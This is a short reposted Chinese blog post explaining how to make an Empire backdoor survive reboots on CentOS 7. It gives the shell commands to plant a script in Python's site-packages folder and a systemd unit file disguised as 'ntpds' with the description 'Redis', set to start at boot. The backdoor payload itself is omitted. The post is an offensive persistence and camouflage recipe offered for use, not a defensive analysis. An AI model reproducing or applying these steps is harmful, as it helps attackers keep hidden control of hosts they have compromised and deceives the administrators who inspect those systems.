centos7下面利用服务启动empire后门的方法

时间:2020-01-08 11:44:57   收藏:0   阅读:138

//centos7下面利用服务启动empire后门的方法:

vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门
chmod 755 /usr/lib/python2.7/site-packages/pci.sh
cd /usr/lib/systemd/system
vi ntpds.service
chmod 755 ntpds.service
systemctl enable ntpds.service //设置开机启动
systemctl start ntpds.service
systemctl status ntpds.service

//pci.sh是empire后门代码:
#!/bin/sh
python后门代码略
//ntpds.service启动文件
[Unit]
Description=Redis
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=forking
ExecStart=/usr/lib/python2.7/site-packages/pci.sh
ExecStop=
 
[Install]
WantedBy=multi-user.target

  

empire后门上线了:

技术分享图片

原文:https://www.cnblogs.com/pt007/p/12165593.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!